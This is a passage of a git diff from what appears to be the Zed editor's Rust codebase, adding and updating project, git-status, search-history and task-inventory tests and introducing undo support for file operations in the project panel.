tree.flush_fs_events(cx).await; + + cx.update(|cx| { + assert!( + tree.read(cx) + .entry_for_path(rel_path("repro/repro-marker")) + .is_some() + ); + }); +} + #[gpui::test(iterations = 10)] async fn test_buffer_identity_across_renames(cx: &mut gpui::TestAppContext) { init_test(cx); @@ -5506,7 +5890,7 @@ async fn test_buffer_is_dirty(cx: &mut gpui::TestAppContext) { assert_eq!( *events.lock(), &[ - language::BufferEvent::Edited, + language::BufferEvent::Edited { is_local: true }, language::BufferEvent::DirtyChanged ] ); @@ -5535,9 +5919,9 @@ async fn test_buffer_is_dirty(cx: &mut gpui::TestAppContext) { assert_eq!( *events.lock(), &[ - language::BufferEvent::Edited, + language::BufferEvent::Edited { is_local: true }, language::BufferEvent::DirtyChanged, - language::BufferEvent::Edited, + language::BufferEvent::Edited { is_local: true }, ], ); events.lock().clear(); @@ -5552,7 +5936,7 @@ async fn test_buffer_is_dirty(cx: &mut gpui::TestAppContext) { assert_eq!( *events.lock(), &[ - language::BufferEvent::Edited, + language::BufferEvent::Edited { is_local: true }, language::BufferEvent::DirtyChanged ] ); @@ -5592,7 +5976,7 @@ async fn test_buffer_is_dirty(cx: &mut gpui::TestAppContext) { assert_eq!( mem::take(&mut *events.lock()), &[ - language::BufferEvent::Edited, + language::BufferEvent::Edited { is_local: true }, language::BufferEvent::DirtyChanged ] ); @@ -5607,7 +5991,7 @@ async fn test_buffer_is_dirty(cx: &mut gpui::TestAppContext) { assert_eq!( *events.lock(), &[ - language::BufferEvent::Edited, + language::BufferEvent::Edited { is_local: true }, language::BufferEvent::DirtyChanged ] ); @@ -5641,6 +6025,75 @@ async fn test_buffer_is_dirty(cx: &mut gpui::TestAppContext) { cx.update(|cx| assert!(buffer3.read(cx).is_dirty())); } +#[gpui::test] +async fn test_dirty_buffer_reloads_after_undo(cx: &mut gpui::TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + path!("/dir"), + json!({ + "file.txt": "version 1", + }), + ) + .await; + + let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; + let buffer = project + .update(cx, |p, cx| p.open_local_buffer(path!("/dir/file.txt"), cx)) + .await + .unwrap(); + + buffer.read_with(cx, |buffer, _| { + assert_eq!(buffer.text(), "version 1"); + assert!(!buffer.is_dirty()); + }); + + // User makes an edit, making the buffer dirty. + buffer.update(cx, |buffer, cx| { + buffer.edit([(0..0, "user edit: ")], None, cx); + }); + + buffer.read_with(cx, |buffer, _| { + assert!(buffer.is_dirty()); + assert_eq!(buffer.text(), "user edit: version 1"); + }); + + // External tool writes new content while buffer is dirty. + // file_updated() updates the File but suppresses ReloadNeeded. + fs.save( + path!("/dir/file.txt").as_ref(), + &"version 2 from external tool".into(), + Default::default(), + ) + .await + .unwrap(); + cx.executor().run_until_parked(); + + buffer.read_with(cx, |buffer, _| { + assert!(buffer.has_conflict()); + assert_eq!(buffer.text(), "user edit: version 1"); + }); + + // User undoes their edit. Buffer becomes clean, but disk has different + // content. did_edit() detects the dirty->clean transition and checks if + // disk changed while dirty. Since mtime differs from saved_mtime, it + // emits ReloadNeeded. + buffer.update(cx, |buffer, cx| { + buffer.undo(cx); + }); + cx.executor().run_until_parked(); + + buffer.read_with(cx, |buffer, _| { + assert_eq!( + buffer.text(), + "version 2 from external tool", + "buffer should reload from disk after undo makes it clean" + ); + assert!(!buffer.is_dirty()); + }); +} + #[gpui::test] async fn test_buffer_file_changes_on_disk(cx: &mut gpui::TestAppContext) { init_test(cx); @@ -7549,6 +8002,92 @@ async fn test_code_actions_only_kinds(cx: &mut gpui::TestAppContext) { ); } +#[gpui::test] +async fn test_code_actions_without_requested_kinds_do_not_send_only_filter( + cx: &mut gpui::TestAppContext, +) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + path!("/dir"), + json!({ + "a.ts": "a", + }), + ) + .await; + + let project = Project::test(fs, [path!("/dir").as_ref()], cx).await; + + let language_registry = project.read_with(cx, |project, _| project.languages().clone()); + language_registry.add(typescript_lang()); + let mut fake_language_servers = language_registry.register_fake_lsp( + "TypeScript", + FakeLspAdapter { + capabilities: lsp::ServerCapabilities { + code_action_provider: Some(lsp::CodeActionProviderCapability::Options( + lsp::CodeActionOptions { + code_action_kinds: Some(vec![ + CodeActionKind::SOURCE_ORGANIZE_IMPORTS, + "source.doc".into(), + ]), + ..lsp::CodeActionOptions::default() + }, + )), + ..lsp::ServerCapabilities::default() + }, + ..FakeLspAdapter::default() + }, + ); + + let (buffer, _handle) = project + .update(cx, |p, cx| { + p.open_local_buffer_with_lsp(path!("/dir/a.ts"), cx) + }) + .await + .unwrap(); + cx.executor().run_until_parked(); + + let fake_server = fake_language_servers + .next() + .await + .expect("failed to get the language server"); + + let mut request_handled = fake_server.set_request_handler::< + lsp::request::CodeActionRequest, + _, + _, + >(move |params, _| async move { + assert_eq!( + params.context.only, None, + "Code action requests without explicit kind filters should not send `context.only`" + ); + Ok(Some(vec![lsp::CodeActionOrCommand::CodeAction( + lsp::CodeAction { + title: "Add test".to_string(), + kind: Some("source.addTest".into()), + ..lsp::CodeAction::default() + }, + )])) + }); + + let code_actions_task = project.update(cx, |project, cx| { + project.code_actions(&buffer, 0..buffer.read(cx).len(), None, cx) + }); + + let () = request_handled + .next() + .await + .expect("The code action request should have been triggered"); + + let code_actions = code_actions_task.await.unwrap().unwrap(); + assert_eq!(code_actions.len(), 1); + assert_eq!( + code_actions[0].lsp_action.action_kind(), + Some("source.addTest".into()) + ); +} + #[gpui::test] async fn test_multiple_language_server_actions(cx: &mut gpui::TestAppContext) { init_test(cx); @@ -7986,9 +8525,10 @@ async fn test_unstaged_diff_for_buffer(cx: &mut gpui::TestAppContext) { unstaged_diff.update(cx, |unstaged_diff, cx| { let snapshot = buffer.read(cx).snapshot(); assert_hunks( - unstaged_diff - .snapshot(cx) - .hunks_intersecting_range(Anchor::MIN..Anchor::MAX, &snapshot), + unstaged_diff.snapshot(cx).hunks_intersecting_range( + Anchor::min_max_range_for_buffer(snapshot.remote_id()), + &snapshot, + ), &snapshot, &unstaged_diff.base_text(cx).text(), &[( @@ -8077,8 +8617,10 @@ async fn test_uncommitted_diff_for_buffer(cx: &mut gpui::TestAppContext) { diff_1.update(cx, |diff, cx| { let snapshot = buffer_1.read(cx).snapshot(); assert_hunks( - diff.snapshot(cx) - .hunks_intersecting_range(Anchor::MIN..Anchor::MAX, &snapshot), + diff.snapshot(cx).hunks_intersecting_range( + Anchor::min_max_range_for_buffer(snapshot.remote_id()), + &snapshot, + ), &snapshot, &diff.base_text_string(cx).unwrap(), &[ @@ -8119,8 +8661,10 @@ async fn test_uncommitted_diff_for_buffer(cx: &mut gpui::TestAppContext) { diff_1.update(cx, |diff, cx| { let snapshot = buffer_1.read(cx).snapshot(); assert_hunks( - diff.snapshot(cx) - .hunks_intersecting_range(Anchor::MIN..Anchor::MAX, &snapshot), + diff.snapshot(cx).hunks_intersecting_range( + Anchor::min_max_range_for_buffer(snapshot.remote_id()), + &snapshot, + ), &snapshot, &diff.base_text(cx).text(), &[( @@ -8149,8 +8693,10 @@ async fn test_uncommitted_diff_for_buffer(cx: &mut gpui::TestAppContext) { diff_2.update(cx, |diff, cx| { let snapshot = buffer_2.read(cx).snapshot(); assert_hunks( - diff.snapshot(cx) - .hunks_intersecting_range(Anchor::MIN..Anchor::MAX, &snapshot), + diff.snapshot(cx).hunks_intersecting_range( + Anchor::min_max_range_for_buffer(snapshot.remote_id()), + &snapshot, + ), &snapshot, &diff.base_text_string(cx).unwrap(), &[( @@ -8171,8 +8717,10 @@ async fn test_uncommitted_diff_for_buffer(cx: &mut gpui::TestAppContext) { diff_2.update(cx, |diff, cx| { let snapshot = buffer_2.read(cx).snapshot(); assert_hunks( - diff.snapshot(cx) - .hunks_intersecting_range(Anchor::MIN..Anchor::MAX, &snapshot), + diff.snapshot(cx).hunks_intersecting_range( + Anchor::min_max_range_for_buffer(snapshot.remote_id()), + &snapshot, + ), &snapshot, &diff.base_text_string(cx).unwrap(), &[( @@ -9207,14 +9755,23 @@ async fn test_git_repository_status(cx: &mut gpui::TestAppContext) { StatusEntry { repo_path: repo_path("a.txt"), status: StatusCode::Modified.worktree(), + diff_stat: Some(DiffStat { + added: 1, + deleted: 1, + }), }, StatusEntry { repo_path: repo_path("b.txt"), status: FileStatus::Untracked, + diff_stat: None, }, StatusEntry { repo_path: repo_path("d.txt"), status: StatusCode::Deleted.worktree(), + diff_stat: Some(DiffStat { + added: 0, + deleted: 1, + }), }, ] ); @@ -9236,18 +9793,31 @@ async fn test_git_repository_status(cx: &mut gpui::TestAppContext) { StatusEntry { repo_path: repo_path("a.txt"), status: StatusCode::Modified.worktree(), + diff_stat: Some(DiffStat { + added: 1, + deleted: 1, + }), }, StatusEntry { repo_path: repo_path("b.txt"), status: FileStatus::Untracked, + diff_stat: None, }, StatusEntry { repo_path: repo_path("c.txt"), status: StatusCode::Modified.worktree(), + diff_stat: Some(DiffStat { + added: 1, + deleted: 1, + }), }, StatusEntry { repo_path: repo_path("d.txt"), status: StatusCode::Deleted.worktree(), + diff_stat: Some(DiffStat { + added: 0, + deleted: 1, + }), }, ] ); @@ -9281,6 +9851,10 @@ async fn test_git_repository_status(cx: &mut gpui::TestAppContext) { [StatusEntry { repo_path: repo_path("a.txt"), status: StatusCode::Deleted.worktree(), + diff_stat: Some(DiffStat { + added: 0, + deleted: 1, + }), }] ); }); @@ -9345,6 +9919,7 @@ async fn test_git_status_postprocessing(cx: &mut gpui::TestAppContext) { worktree_status: StatusCode::Added } .into(), + diff_stat: None, }] ) }); @@ -9547,6 +10122,10 @@ async fn test_repository_pending_ops_staging( worktree_status: StatusCode::Unmodified } .into(), + diff_stat: Some(DiffStat { + added: 1, + deleted: 0, + }), }] ); }); @@ -9653,6 +10232,10 @@ async fn test_repository_pending_ops_long_running_staging( worktree_status: StatusCode::Unmodified } .into(), + diff_stat: Some(DiffStat { + added: 1, + deleted: 0, + }), }] ); }); @@ -9777,10 +10360,12 @@ async fn test_repository_pending_ops_stage_all( StatusEntry { repo_path: repo_path("a.txt"), status: FileStatus::Untracked, + diff_stat: None, }, StatusEntry { repo_path: repo_path("b.txt"), status: FileStatus::Untracked, + diff_stat: None, }, ] ); @@ -10409,10 +10994,7 @@ async fn test_ignored_dirs_events(cx: &mut gpui::TestAppContext) { assert_eq!( repository_updates.lock().drain(..).collect::>(), - vec![ - RepositoryEvent::StatusesChanged, - RepositoryEvent::MergeHeadsChanged, - ], + vec![RepositoryEvent::StatusesChanged,], "Initial worktree scan should produce a repo update event" ); assert_eq!( @@ -10579,8 +11161,7 @@ async fn test_odd_events_for_ignored_dirs( assert_eq!( repository_updates.lock().drain(..).collect::>(), vec![ - RepositoryEvent::MergeHeadsChanged, - RepositoryEvent::BranchChanged, + RepositoryEvent::HeadChanged, RepositoryEvent::StatusesChanged, RepositoryEvent::StatusesChanged, ], @@ -10924,6 +11505,14 @@ async fn test_git_worktrees_and_submodules(cx: &mut gpui::TestAppContext) { repo.read(cx).work_directory_abs_path, Path::new(path!("/project/some-worktree")).into(), ); + pretty_assertions::assert_eq!( + repo.read(cx).original_repo_abs_path, + Path::new(path!("/project")).into(), + ); + assert!( + repo.read(cx).linked_worktree_path().is_some(), + "linked worktree should be detected as a linked worktree" + ); let barrier = repo.update(cx, |repo, _| repo.barrier()); (repo.clone(), barrier) }); @@ -10969,6 +11558,14 @@ async fn test_git_worktrees_and_submodules(cx: &mut gpui::TestAppContext) { repo.read(cx).work_directory_abs_path, Path::new(path!("/project/subdir/some-submodule")).into(), ); + pretty_assertions::assert_eq!( + repo.read(cx).original_repo_abs_path, + Path::new(path!("/project/subdir/some-submodule")).into(), + ); + assert!( + repo.read(cx).linked_worktree_path().is_none(), + "submodule should not be detected as a linked worktree" + ); let barrier = repo.update(cx, |repo, _| repo.barrier()); (repo.clone(), barrier) }); @@ -11241,6 +11838,77 @@ async fn test_undo_encoding_change(cx: &mut gpui::TestAppContext) { }); } +#[gpui::test] +async fn test_initial_scan_complete(cx: &mut gpui::TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + path!("/root"), + json!({ + "a": { + ".git": {}, + ".zed": { + "tasks.json": r#"[{"label": "task-a", "command": "echo a"}]"# + }, + "src": { "main.rs": "" } + }, + "b": { + ".git": {}, + ".zed": { + "tasks.json": r#"[{"label": "task-b", "command": "echo b"}]"# + }, + "src": { "lib.rs": "" } + }, + }), + ) + .await; + + let repos_created = Rc::new(RefCell::new(Vec::new())); + let _observe = { + let repos_created = repos_created.clone(); + cx.update(|cx| { + cx.observe_new::(move |repo, _, cx| { + repos_created.borrow_mut().push(cx.entity().downgrade()); + let _ = repo; + }) + }) + }; + + let project = Project::test( + fs.clone(), + [path!("/root/a").as_ref(), path!("/root/b").as_ref()], + cx, + ) + .await; + + let scan_complete = project.read_with(cx, |project, cx| project.wait_for_initial_scan(cx)); + scan_complete.await; + + project.read_with(cx, |project, cx| { + assert!( + project.worktree_store().read(cx).initial_scan_completed(), + "Expected initial scan to be completed after awaiting wait_for_initial_scan" + ); + }); + + let created_repos_len = repos_created.borrow().len(); + assert_eq!( + created_repos_len, 2, + "Expected 2 repositories to be created during scan, got {}", + created_repos_len + ); + + project.read_with(cx, |project, cx| { + let git_store = project.git_store().read(cx); + assert_eq!( + git_store.repositories().len(), + 2, + "Expected 2 repositories in GitStore" + ); + }); +} + pub fn init_test(cx: &mut gpui::TestAppContext) { zlog::init_test(); @@ -11288,7 +11956,6 @@ fn python_lang(fs: Arc) -> Arc { worktree_root: PathBuf, subroot_relative_path: Arc, _: Option>, - _: &dyn Fs, ) -> ToolchainList { // This lister will always return a path .venv directories within ancestors let ancestors = subroot_relative_path.ancestors().collect::>(); @@ -11313,7 +11980,6 @@ fn python_lang(fs: Arc) -> Arc { &self, _: PathBuf, _: Option>, - _: &dyn Fs, ) -> anyhow::Result { Err(anyhow::anyhow!("Not implemented")) } diff --git a/crates/project/tests/integration/search.rs b/crates/project/tests/integration/search.rs index b28240289c8a5b28e4db2827e4c08b745082f4f3..79266405084d293329056b55a57c72a043aa8ff0 100644 --- a/crates/project/tests/integration/search.rs +++ b/crates/project/tests/integration/search.rs @@ -148,7 +148,7 @@ async fn test_multiline_regex(cx: &mut gpui::TestAppContext) { use language::Buffer; let text = Rope::from("hello\nworld\nhello\nworld"); let snapshot = cx - .update(|app| Buffer::build_snapshot(text, None, None, app)) + .update(|app| Buffer::build_snapshot(text, None, None, None, app)) .await; let results = search_query.search(&snapshot, None).await; diff --git a/crates/project/tests/integration/search_history.rs b/crates/project/tests/integration/search_history.rs index 4b2d2b90ef0b91d2ff768dcd1a44d2ccfdc529d4..c6dfbe717c9e794474cc6641e5af0a03e1d38860 100644 --- a/crates/project/tests/integration/search_history.rs +++ b/crates/project/tests/integration/search_history.rs @@ -38,7 +38,7 @@ fn test_add() { // add item when it equals to current item if it's not the last one search_history.add(&mut cursor, "php".to_string()); - search_history.previous(&mut cursor); + search_history.previous(&mut cursor, ""); assert_eq!(search_history.current(&cursor), Some("rustlang")); search_history.add(&mut cursor, "rustlang".to_string()); assert_eq!(search_history.len(), 3, "Should add item"); @@ -71,13 +71,13 @@ fn test_next_and_previous() { assert_eq!(search_history.current(&cursor), Some("TypeScript")); - assert_eq!(search_history.previous(&mut cursor), Some("JavaScript")); + assert_eq!(search_history.previous(&mut cursor, ""), Some("JavaScript")); assert_eq!(search_history.current(&cursor), Some("JavaScript")); - assert_eq!(search_history.previous(&mut cursor), Some("Rust")); + assert_eq!(search_history.previous(&mut cursor, ""), Some("Rust")); assert_eq!(search_history.current(&cursor), Some("Rust")); - assert_eq!(search_history.previous(&mut cursor), None); + assert_eq!(search_history.previous(&mut cursor, ""), None); assert_eq!(search_history.current(&cursor), Some("Rust")); assert_eq!(search_history.next(&mut cursor), Some("JavaScript")); @@ -103,14 +103,14 @@ fn test_reset_selection() { cursor.reset(); assert_eq!(search_history.current(&cursor), None); assert_eq!( - search_history.previous(&mut cursor), + search_history.previous(&mut cursor, ""), Some("TypeScript"), "Should start from the end after reset on previous item query" ); - search_history.previous(&mut cursor); + search_history.previous(&mut cursor, ""); assert_eq!(search_history.current(&cursor), Some("JavaScript")); - search_history.previous(&mut cursor); + search_history.previous(&mut cursor, ""); assert_eq!(search_history.current(&cursor), Some("Rust")); cursor.reset(); @@ -134,8 +134,11 @@ fn test_multiple_cursors() { assert_eq!(search_history.current(&cursor1), Some("TypeScript")); assert_eq!(search_history.current(&cursor2), Some("C++")); - assert_eq!(search_history.previous(&mut cursor1), Some("JavaScript")); - assert_eq!(search_history.previous(&mut cursor2), Some("Java")); + assert_eq!( + search_history.previous(&mut cursor1, ""), + Some("JavaScript") + ); + assert_eq!(search_history.previous(&mut cursor2, ""), Some("Java")); assert_eq!(search_history.next(&mut cursor1), Some("TypeScript")); assert_eq!(search_history.next(&mut cursor1), Some("Python")); diff --git a/crates/project/tests/integration/task_inventory.rs b/crates/project/tests/integration/task_inventory.rs index fe42a0dea28645fcbf636f9e62608b549249fb93..6c51fa93571c4ca5d5f55631c67b29c1bc1c9963 100644 --- a/crates/project/tests/integration/task_inventory.rs +++ b/crates/project/tests/integration/task_inventory.rs @@ -560,6 +560,54 @@ async fn test_inventory_static_task_filters(cx: &mut TestAppContext) { ); } +#[gpui::test] +async fn test_zed_tasks_take_precedence_over_vscode(cx: &mut TestAppContext) { + init_test(cx); + let inventory = cx.update(|cx| Inventory::new(cx)); + let worktree_id = WorktreeId::from_usize(0); + + inventory.update(cx, |inventory, _| { + inventory + .update_file_based_tasks( + TaskSettingsLocation::Worktree(SettingsLocation { + worktree_id, + path: rel_path(".vscode"), + }), + Some(&mock_tasks_from_names(["vscode_task"])), + ) + .unwrap(); + }); + assert_eq!( + task_template_names(&inventory, Some(worktree_id), cx).await, + vec!["vscode_task"], + "With only .vscode tasks, they should appear" + ); + + inventory.update(cx, |inventory, _| { + inventory + .update_file_based_tasks( + TaskSettingsLocation::Worktree(SettingsLocation { + worktree_id, + path: rel_path(".zed"), + }), + Some(&mock_tasks_from_names(["zed_task"])), + ) + .unwrap(); + }); + assert_eq!( + task_template_names(&inventory, Some(worktree_id), cx).await, + vec!["zed_task"], + "With both .zed and .vscode tasks, only .zed tasks should appear" + ); + + register_worktree_task_used(&inventory, worktree_id, "zed_task", cx).await; + let resolved = resolved_task_names(&inventory, Some(worktree_id), cx).await; + assert!( + !resolved.iter().any(|name| name == "vscode_task"), + "Previously used .vscode tasks should not appear when .zed tasks exist, got: {resolved:?}" + ); +} + fn init_test(_cx: &mut TestAppContext) { zlog::init_test(); TaskStore::init(None); diff --git a/crates/project_panel/Cargo.toml b/crates/project_panel/Cargo.toml index 5149c6f7834474439bd6119511bb294b560fe4de..2192b8daf3a301d580a3cef73426f6348508a566 100644 --- a/crates/project_panel/Cargo.toml +++ b/crates/project_panel/Cargo.toml @@ -20,7 +20,6 @@ doctest = false anyhow.workspace = true collections.workspace = true command_palette_hooks.workspace = true -db.workspace = true editor.workspace = true file_icons.workspace = true git_ui.workspace = true @@ -37,6 +36,7 @@ serde_json.workspace = true settings.workspace = true smallvec.workspace = true theme.workspace = true +theme_settings.workspace = true rayon.workspace = true ui.workspace = true util.workspace = true @@ -47,6 +47,7 @@ language.workspace = true zed_actions.workspace = true telemetry.workspace = true notifications.workspace = true +feature_flags.workspace = true [dev-dependencies] client = { workspace = true, features = ["test-support"] } diff --git a/crates/project_panel/src/project_panel.rs b/crates/project_panel/src/project_panel.rs index f6908b2c7fa3efa09b94377eb6f58165c1512088..d1a5b8a0ece5e3ddc6b1fe924154583b401a0fc9 100644 --- a/crates/project_panel/src/project_panel.rs +++ b/crates/project_panel/src/project_panel.rs @@ -1,11 +1,11 @@ pub mod project_panel_settings; +mod undo; mod utils; use anyhow::{Context as _, Result}; use client::{ErrorCode, ErrorExt}; use collections::{BTreeSet, HashMap, hash_map}; use command_palette_hooks::CommandPaletteFilter; -use db::kvp::KEY_VALUE_STORE; use editor::{ Editor, EditorEvent, MultiBufferOffset, items::{ @@ -13,20 +13,21 @@ use editor::{ entry_diagnostic_aware_icon_name_and_color, entry_git_aware_label_color, }, }; +use feature_flags::{FeatureFlagAppExt, ProjectPanelUndoRedoFeatureFlag}; use file_icons::FileIcons; use git; use git::status::GitSummary; use git_ui; use git_ui::file_diff_view::FileDiffView; use gpui::{ - Action, AnyElement, App, AsyncWindowContext, Bounds, ClipboardItem, Context, CursorStyle, - DismissEvent, Div, DragMoveEvent, Entity, EventEmitter, ExternalPaths, FocusHandle, Focusable, - FontWeight, Hsla, InteractiveElement, KeyContext, ListHorizontalSizingBehavior, - ListSizingBehavior, Modifiers, ModifiersChangedEvent, MouseButton, MouseDownEvent, - ParentElement, PathPromptOptions, Pixels, Point, PromptLevel, Render, ScrollStrategy, Stateful, - Styled, Subscription, Task, UniformListScrollHandle, WeakEntity, Window, actions, anchored, - deferred, div, hsla, linear_color_stop, linear_gradient, point, px, size, transparent_white, - uniform_list, + Action, AnyElement, App, AsyncWindowContext, Bounds, ClipboardEntry as GpuiClipboardEntry, + ClipboardItem, Context, CursorStyle, DismissEvent, Div, DragMoveEvent, Entity, EventEmitter, + ExternalPaths, FocusHandle, Focusable, FontWeight, Hsla, InteractiveElement, KeyContext, + ListHorizontalSizingBehavior, ListSizingBehavior, Modifiers, ModifiersChangedEvent, + MouseButton, MouseDownEvent, ParentElement, PathPromptOptions, Pixels, Point, PromptLevel, + Render, ScrollStrategy, Stateful, Styled, Subscription, Task, UniformListScrollHandle, + WeakEntity, Window, actions, anchored, deferred, div, hsla, linear_color_stop, linear_gradient, + point, px, size, transparent_white, uniform_list, }; use language::DiagnosticSeverity; use menu::{Confirm, SelectFirst, SelectLast, SelectNext, SelectPrevious}; @@ -40,12 +41,13 @@ use project::{ use project_panel_settings::ProjectPanelSettings; use rayon::slice::ParallelSliceMut; use schemars::JsonSchema; -use serde::{Deserialize, Serialize}; +use serde::Deserialize; use settings::{ DockSide, ProjectPanelEntrySpacing, Settings, SettingsStore, ShowDiagnostics, ShowIndentGuides, update_settings_file, }; use smallvec::SmallVec; +use std::ops::Neg; use std::{any::TypeId, time::Instant}; use std::{ cell::OnceCell, @@ -56,12 +58,12 @@ use std::{ sync::Arc, time::Duration, }; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use ui::{ Color, ContextMenu, ContextMenuEntry, DecoratedIcon, Divider, Icon, IconDecoration, - IconDecorationKind, IndentGuideColors, IndentGuideLayout, KeyBinding, Label, LabelSize, - ListItem, ListItemSpacing, ScrollAxes, ScrollableHandle, Scrollbars, StickyCandidate, Tooltip, - WithScrollbar, prelude::*, v_flex, + IconDecorationKind, IndentGuideColors, IndentGuideLayout, Indicator, KeyBinding, Label, + LabelSize, ListItem, ListItemSpacing, ScrollAxes, ScrollableHandle, Scrollbars, + StickyCandidate, Tooltip, WithScrollbar, prelude::*, v_flex, }; use util::{ ResultExt, TakeUntilExt, TryFutureExt, maybe, @@ -69,8 +71,8 @@ use util::{ rel_path::{RelPath, RelPathBuf}, }; use workspace::{ - DraggedSelection, OpenInTerminal, OpenOptions, OpenVisible, PreviewTabsSettings, SelectedEntry, - SplitDirection, Workspace, + DraggedSelection, OpenInTerminal, OpenMode, OpenOptions, OpenVisible, PreviewTabsSettings, + SelectedEntry, SplitDirection, Workspace, dock::{DockPosition, Panel, PanelEvent}, notifications::{DetachAndPromptErr, NotifyResultExt, NotifyTaskExt}, }; @@ -80,6 +82,11 @@ use zed_actions::{ workspace::OpenWithSystem, }; +use crate::{ + project_panel_settings::ProjectPanelScrollbarProxy, + undo::{ProjectPanelOperation, UndoManager}, +}; + const PROJECT_PANEL_KEY: &str = "ProjectPanel"; const NEW_ENTRY_ID: ProjectEntryId = ProjectEntryId::MAX; @@ -143,8 +150,6 @@ pub struct ProjectPanel { clipboard: Option, _dragged_entry_destination: Option>, workspace: WeakEntity, - width: Option, - pending_serialization: Task>, diagnostics: HashMap<(WorktreeId, Arc), DiagnosticSeverity>, diagnostic_counts: HashMap<(WorktreeId, Arc), DiagnosticCount>, diagnostic_summary_update: Task<()>, @@ -156,6 +161,7 @@ pub struct ProjectPanel { sticky_items_count: usize, last_reported_update: Instant, update_visible_entries_task: UpdateVisibleEntriesTask, + undo_manager: UndoManager, state: State, } @@ -393,6 +399,8 @@ actions!( SelectPrevDirectory, /// Opens a diff view to compare two marked files. CompareMarkedFiles, + /// Undoes the last file operation. + Undo, ] ); @@ -602,11 +610,6 @@ pub enum Event { Focus, } -#[derive(Serialize, Deserialize)] -struct SerializedProjectPanel { - width: Option, -} - struct DraggedProjectEntryView { selection: SelectedEntry, icon: Option, @@ -872,8 +875,6 @@ impl ProjectPanel { clipboard: None, _dragged_entry_destination: None, workspace: workspace.weak_handle(), - width: None, - pending_serialization: Task::ready(None), diagnostics: Default::default(), diagnostic_counts: Default::default(), diagnostic_summary_update: Task::ready(()), @@ -894,6 +895,7 @@ impl ProjectPanel { unfolded_dir_ids: Default::default(), }, update_visible_entries_task: Default::default(), + undo_manager: UndoManager::new(workspace.weak_handle()), }; this.update_visible_entries(None, false, false, window, cx); @@ -993,35 +995,8 @@ impl ProjectPanel { workspace: WeakEntity, mut cx: AsyncWindowContext, ) -> Result> { - let serialized_panel = match workspace - .read_with(&cx, |workspace, _| { - ProjectPanel::serialization_key(workspace) - }) - .ok() - .flatten() - { - Some(serialization_key) => cx - .background_spawn(async move { KEY_VALUE_STORE.read_kvp(&serialization_key) }) - .await - .context("loading project panel") - .log_err() - .flatten() - .map(|panel| serde_json::from_str::(&panel)) - .transpose() - .log_err() - .flatten(), - None => None, - }; - workspace.update_in(&mut cx, |workspace, window, cx| { - let panel = ProjectPanel::new(workspace, window, cx); - if let Some(serialized_panel) = serialized_panel { - panel.update(cx, |panel, cx| { - panel.width = serialized_panel.width.map(|px| px.round()); - cx.notify(); - }); - } - panel + ProjectPanel::new(workspace, window, cx) }) } @@ -1095,40 +1070,6 @@ impl ProjectPanel { .or_insert(diagnostic_severity); } - fn serialization_key(workspace: &Workspace) -> Option { - workspace - .database_id() - .map(|id| i64::from(id).to_string()) - .or(workspace.session_id()) - .map(|id| format!("{}-{:?}", PROJECT_PANEL_KEY, id)) - } - - fn serialize(&mut self, cx: &mut Context) { - let Some(serialization_key) = self - .workspace - .read_with(cx, |workspace, _| { - ProjectPanel::serialization_key(workspace) - }) - .ok() - .flatten() - else { - return; - }; - let width = self.width; - self.pending_serialization = cx.background_spawn( - async move { - KEY_VALUE_STORE - .write_kvp( - serialization_key, - serde_json::to_string(&SerializedProjectPanel { width })?, - ) - .await?; - anyhow::Ok(()) - } - .log_err(), - ); - } - fn focus_in(&mut self, window: &mut Window, cx: &mut Context) { if !self.focus_handle.contains_focused(window, cx) { cx.emit(Event::Focus); @@ -1186,8 +1127,9 @@ impl ProjectPanel { .is_some() }; + let has_pasteable_content = self.has_pasteable_content(cx); let entity = cx.entity(); - let context_menu = ContextMenu::build(window, cx, |menu, _, _| { + let context_menu = ContextMenu::build(window, cx, |menu, _, cx| { menu.context(self.focus_handle.clone()).map(|menu| { if is_read_only { menu.when(is_dir, |menu| { @@ -1199,13 +1141,7 @@ impl ProjectPanel { .separator() .when(is_local, |menu| { menu.action( - if cfg!(target_os = "macos") && !is_remote { - "Reveal in Finder" - } else if cfg!(target_os = "windows") && !is_remote { - "Reveal in File Explorer" - } else { - "Reveal in File Manager" - }, + ui::utils::reveal_in_file_manager_label(is_remote), Box::new(RevealInFileManager), ) }) @@ -1232,11 +1168,14 @@ impl ProjectPanel { .action("Copy", Box::new(Copy)) .action("Duplicate", Box::new(Duplicate)) // TODO: Paste should always be visible, cbut disabled when clipboard is empty - .action_disabled_when( - self.clipboard.as_ref().is_none(), - "Paste", - Box::new(Paste), - ) + .action_disabled_when(!has_pasteable_content, "Paste", Box::new(Paste)) + .when(cx.has_flag::(), |menu| { + menu.action_disabled_when( + !self.undo_manager.can_undo(), + "Undo", + Box::new(Undo), + ) + }) .when(is_remote, |menu| { menu.separator() .action("Download...", Box::new(DownloadFromRemote)) @@ -1882,6 +1821,8 @@ impl ProjectPanel { let edit_task; let edited_entry_id; + let edited_entry; + let new_project_path: ProjectPath; if is_new_entry { self.selection = Some(SelectedEntry { worktree_id, @@ -1892,12 +1833,14 @@ impl ProjectPanel { return None; } + edited_entry = None; edited_entry_id = NEW_ENTRY_ID; + new_project_path = (worktree_id, new_path).into(); edit_task = self.project.update(cx, |project, cx| { - project.create_entry((worktree_id, new_path), is_dir, cx) + project.create_entry(new_project_path.clone(), is_dir, cx) }); } else { - let new_path = if let Some(parent) = entry.path.clone().parent() { + let new_path = if let Some(parent) = entry.path.parent() { parent.join(&filename) } else { filename.clone() @@ -1909,9 +1852,11 @@ impl ProjectPanel { return None; } edited_entry_id = entry.id; + edited_entry = Some(entry); + new_project_path = (worktree_id, new_path).into(); edit_task = self.project.update(cx, |project, cx| { - project.rename_entry(entry.id, (worktree_id, new_path).into(), cx) - }); + project.rename_entry(edited_entry_id, new_project_path.clone(), cx) + }) }; if refocus { @@ -1924,6 +1869,22 @@ impl ProjectPanel { let new_entry = edit_task.await; project_panel.update(cx, |project_panel, cx| { project_panel.state.edit_state = None; + + // Record the operation if the edit was applied + if new_entry.is_ok() { + let operation = if let Some(old_entry) = edited_entry { + ProjectPanelOperation::Rename { + old_path: (worktree_id, old_entry.path).into(), + new_path: new_project_path, + } + } else { + ProjectPanelOperation::Create { + project_path: new_project_path, + } + }; + project_panel.undo_manager.record(operation); + } + cx.notify(); })?; @@ -2174,6 +2135,11 @@ impl ProjectPanel { } } + pub fn undo(&mut self, _: &Undo, _window: &mut Window, cx: &mut Context) 